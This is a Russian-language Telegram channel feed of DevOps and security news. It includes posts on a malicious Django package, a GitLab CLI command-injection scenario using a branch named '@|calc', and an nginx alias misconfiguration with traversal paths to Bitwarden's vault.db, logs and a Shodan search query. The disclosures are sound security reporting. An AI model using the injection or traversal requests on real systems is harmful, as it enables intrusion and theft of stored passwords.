Forwarded from disasm.me channel
Нашел забавный бэкдорчик для фреймворка django - djangounittest
Он itw был девять дней (мы уже зарепортили о нем, уже удалён) и в качестве легенды заявляет, что он - библиотека для юнит-тестов
В первый день, 27 мая, разработчик распространял вредоносную нагрузку в виде pyc-файла под python 3.10, но понял, что его нагрузка не отрабатывает под другими версиями питона, поэтому упростил себе задачу (на первом скрине)
Далее он экспериментировал, изменял код, пока не решил сегодня использовать обфускацию. Далее на скринах вы сможете посмотреть, как от простой обфускации он перешел к более сложной.
Собственно, нагрузка просто создает нового суперпользователя в веб-приложении, без каких-либо отстуков наружу, что усложнит злоумышленнику поиск пораженных веб-серверов.
Далее на скринах - работа нашего (TM) деобфускатора, который сейчас разрабатывается в чертогах PT PyAnalysis.
В общем, интересный вектор атаки - добавление суперпользователя в веб-приложение. Если б злоумышленник не стал использовать обфускацию, этот пакет оставался бы еще некоторое время незамеченным, что немного иронично)
Он itw был девять дней (мы уже зарепортили о нем, уже удалён) и в качестве легенды заявляет, что он - библиотека для юнит-тестов
В первый день, 27 мая, разработчик распространял вредоносную нагрузку в виде pyc-файла под python 3.10, но понял, что его нагрузка не отрабатывает под другими версиями питона, поэтому упростил себе задачу (на первом скрине)
Далее он экспериментировал, изменял код, пока не решил сегодня использовать обфускацию. Далее на скринах вы сможете посмотреть, как от простой обфускации он перешел к более сложной.
Собственно, нагрузка просто создает нового суперпользователя в веб-приложении, без каких-либо отстуков наружу, что усложнит злоумышленнику поиск пораженных веб-серверов.
Далее на скринах - работа нашего (TM) деобфускатора, который сейчас разрабатывается в чертогах PT PyAnalysis.
В общем, интересный вектор атаки - добавление суперпользователя в веб-приложение. Если б злоумышленник не стал использовать обфускацию, этот пакет оставался бы еще некоторое время незамеченным, что немного иронично)
👍5😁2👾1
Технологический Болт Генона
Я тут по определённым и независящим от меня обстоятельствам выпал из размеренного образа жизни. Надеюсь, что скоро вернусь в обычный ритм, так что не теряйте меня и не теряйтесь 🤝 А пока обещанная четвёртая часть по проекту Meshtastic. Радиочат, который работает…
Я когда-то давно писал у себя про Meshtastic. Это офигенный проект, цель которого радиочат без сотовой связи и интернета. За это время я даже с автором постов на Хабре успел в личке пообщаться.
И тут я наткнулся на диво дивное и чудо чудное. Оказывается "Ростех" продаёт Meshtastic, как очередной "анало говнет".
Из интересного: в комменты пришёл, видимо, инженер из "Ростеха" и попытался честно отвечать. Ответов было мало 🌝
«Ростех» разработал «независимую сеть передачи данных для беспилотников»
https://habr.com/ru/articles/744606/
> UPD3: «Ростех»потер у себя на сайте новость поменял адрес и убрал изображение терминала
Это вообще позор, пора бы в 2023 году уже знать, что интернет знает и помнит всё.
И тут я наткнулся на диво дивное и чудо чудное. Оказывается "Ростех" продаёт Meshtastic, как очередной "анало говнет".
Из интересного: в комменты пришёл, видимо, инженер из "Ростеха" и попытался честно отвечать. Ответов было мало 🌝
«Ростех» разработал «независимую сеть передачи данных для беспилотников»
https://habr.com/ru/articles/744606/
> UPD3: «Ростех»
Это вообще позор, пора бы в 2023 году уже знать, что интернет знает и помнит всё.
🤡14😁2❤1👍1🙈1
🫡
https://linuxcontainers.org/lxd/
Hello,
Canonical, the creator and main contributor of the LXD project has decided that after over 8 years as part of the Linux Containers community, the project would now be better served directly under Canonical’s own set of projects.
While the team behind Linux Containers regrets that decision and will be missing LXD as one of its projects, it does respect Canonical’s decision and is now in the process of moving the project over.
https://linuxcontainers.org/lxd/
🤔11🤡9👍2🤣1😭1🗿1
This media is not supported in your browser
VIEW IN TELEGRAM
Взято из @flipperzero_unofficial
🔥21👀13👍3👎3👻2🆒1
Выложены доклады с Kubernetes Community Days Zürich 2023, который проходил 15 июня.
Плейлист
https://www.youtube.com/playlist?list=PLj6h78yzYM2M4oTo8BEsrRSutWO8xomiV
Программа
https://kcdzurich.ch/schedule/
Плейлист
https://www.youtube.com/playlist?list=PLj6h78yzYM2M4oTo8BEsrRSutWO8xomiV
Программа
https://kcdzurich.ch/schedule/
🔥4❤1👍1🥱1
Пятница
😁10🔥2👀2👎1
This media is not supported in your browser
VIEW IN TELEGRAM
Attack scenario
1. Attacker creates a repository. They create a branch named "@|calc".
2. To make the attack more convincing, they set this branch as the default branch.
3. Victim clones the repository on their machine.
4. Victim tries to create an MR using glab mr create --web
5. The following command is run: cmd.exe /c "start https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[title]=%s^&merge_request[description]=%s^&merge_request[source_branch]=%s^&merge_request[target_branch]=@|calc^&merge_request[source_project_id]=%d^&merge_request[target_project_id]=%d".
6. The pipe character allows to break out of the URL context and launch calc.
RCE IN GITLAB'S CLI TOOL
http://blog.takemyhand.xyz/2023/07/remote-code-execution-in-gitlabs-cli.html
За ссылку спасибо подписчику.
✍10🫡9🤣4🔥2👏2
SUSE решила "брать быка за рога"
https://www.opennet.ru/opennews/art.shtml?num=59423
Сайт
https://www.suse.com/products/suse-liberty-linux/
Компания SUSE сообщила о создании собственного форка дистрибутива Red Hat Enterprise Linux. В следующие несколько лет в сопровождение проекта планируется инвестировать 10 млн долларов. Форк RHEL, упоминаемый под именем Liberty Linux, планируют развивать и поддерживать в качестве общедоступного проекта, курируемого отдельной некоммерческой организацией. Доступ к формируемому в рамках проекта альтернативному набору исходных текстов пакетов, совместимых с RHEL, будет бесплатен для всех желающих и открыт для совместной работы с другими похожими проектами.
https://www.opennet.ru/opennews/art.shtml?num=59423
Сайт
https://www.suse.com/products/suse-liberty-linux/
🔥12🤨5🦄4😁2🥱1🐳1💯1
Выложены доклады с NDC Oslo 2023, который проходил 15 июня.
Плейлист
https://www.youtube.com/playlist?list=PL03Lrmd9CiGep-YLPFkoLb_oxgTzS4GTX
Программа
https://ndcoslo.com/agenda
ЗЫ
Доклад про магию 🌝
Git Hidden Gems
https://www.youtube.com/watch?v=WtUCZYyv-_w
Плейлист
https://www.youtube.com/playlist?list=PL03Lrmd9CiGep-YLPFkoLb_oxgTzS4GTX
Программа
https://ndcoslo.com/agenda
ЗЫ
Доклад про магию 🌝
Git Hidden Gems
https://www.youtube.com/watch?v=WtUCZYyv-_w
👍3💯1
Forwarded from ITTales :(){ :|:& };:
Тем временем вышел релиз Kubevirt 1.0.0 🎉
За исключением функции хотплага сетевых интерфейсов в ченджлоге ничего интересного.
Но теперь версия явно заявляет что KubeVirt стабилен и готов к продакшену.
https://github.com/kubevirt/kubevirt/releases/tag/v1.0.0
За исключением функции хотплага сетевых интерфейсов в ченджлоге ничего интересного.
Но теперь версия явно заявляет что KubeVirt стабилен и готов к продакшену.
https://github.com/kubevirt/kubevirt/releases/tag/v1.0.0
GitHub
Release v1.0.0 · kubevirt/kubevirt
tag v1.0.0
Tagger: Luboslav Pivarc lpivarc@redhat.com
This release follows v0.59.2 and consists of 1089 changes, contributed by 74 people, leading to 2849 files changed, 232018 insertions(+), 16844...
Tagger: Luboslav Pivarc lpivarc@redhat.com
This release follows v0.59.2 and consists of 1089 changes, contributed by 74 people, leading to 2849 files changed, 232018 insertions(+), 16844...
🍾4
Всем привет!
Мы к себе в Luntry (https://luntry.ru/) ищем Middle/Senior Go Developer
Вилка: от 150 000 до 300 000 ₽ на руки
Про нас:
- Делаем продукт для observability и security Kubernetes
- Разработка и поддержка высоконагруженной системы, обрабатывающий большие потоки данных с кластеров Kubernetes
Требования:
- Опыт промышленной разработки от 3 лет (на Go 1 год)
- Опыт работы с gRPC, PostgreSQL
- Опыт работы с контейнерами Docker
- Понимание концепций распределенных систем
- Опыт работы с микросервисной архитектурой на базе Docker и желательно Kubernetes
Если вы хороши в качестве Python/Java backend разработчика и хотите перекатиться в Go, то такой опыт у нас есть и можете смело писать.
Всякие печеньки и ДМС присутствуют.
Вакансия на hh - https://spb.hh.ru/vacancy/81926204
Писать можно мне в личку - @rusdacent
ЗЫ Если вам просто интересен наш проект и вы знаете где бы вы могли принести пользу, то пишите тоже, вместе подумаем и чего-нибудь придумаем 🌝
Мы к себе в Luntry (https://luntry.ru/) ищем Middle/Senior Go Developer
Вилка: от 150 000 до 300 000 ₽ на руки
Про нас:
- Делаем продукт для observability и security Kubernetes
- Разработка и поддержка высоконагруженной системы, обрабатывающий большие потоки данных с кластеров Kubernetes
Требования:
- Опыт промышленной разработки от 3 лет (на Go 1 год)
- Опыт работы с gRPC, PostgreSQL
- Опыт работы с контейнерами Docker
- Понимание концепций распределенных систем
- Опыт работы с микросервисной архитектурой на базе Docker и желательно Kubernetes
Если вы хороши в качестве Python/Java backend разработчика и хотите перекатиться в Go, то такой опыт у нас есть и можете смело писать.
Всякие печеньки и ДМС присутствуют.
Вакансия на hh - https://spb.hh.ru/vacancy/81926204
Писать можно мне в личку - @rusdacent
ЗЫ Если вам просто интересен наш проект и вы знаете где бы вы могли принести пользу, то пишите тоже, вместе подумаем и чего-нибудь придумаем 🌝
🔥10🤡3👍1👎1
This media is not supported in your browser
VIEW IN TELEGRAM
Пятничное.
На видео представлен процесс появления альтернатив ОСям от Red Hat.
Всем хороших выходных! ❤️
На видео представлен процесс появления альтернатив ОСям от Red Hat.
Всем хороших выходных! ❤️
🔥22😁13💯3🐳2❤🔥1🤯1👀1👾1
Forwarded from Старое старьё
Palmtop от IBM. Не самая редкая штука, но найти такую в рабочем состоянии тяжело, а с неразложившимся экраном - почти нереально. Скорее всего, этот экземпляр мёртв и с высокой вероятностью никогда не оживёт. Но потыкать стоит
👍13🔥5
Forwarded from Cybred
Безопасная конфигурация nginx:
Но во втором случае допущена ошибка (которая и была найдена в исходниках) — пропущен слэш на конце, в директиве
А оттуда выйти в
location /attachments/ {
alias /etc/bitwarden/attachments/;
}
Небезопасная:location /attachments {
alias /etc/bitwarden/attachments/;
}
Обе выполняют одну и ту же функцию — говорят серверу, что при обращении к /attachments, нужно отдавать файлы из директории /etc/bitwarden/attachments.Но во втором случае допущена ошибка (которая и была найдена в исходниках) — пропущен слэш на конце, в директиве
location. Это приводит к Path Traversal и позволяет обратиться на директорию выше, в данном случае, в /etc/bitwarden.А оттуда выйти в
/logs
/attachments../logs/api.logили в той же директории скачать базу данных со всеми паролями:
/attachments../logs/admin.log
/attachments../logs/identity.log
/attachments../logs/notifications.log
/attachments../vault.db
Shodan (> 8 000 инстансов): http.title:"Bitwarden Web Vault"
Баг был сдан на H1 за $6000, но встречается и сегодня у тех, кто забыл обновиться.🫡20😁3👀2🤡1🥴1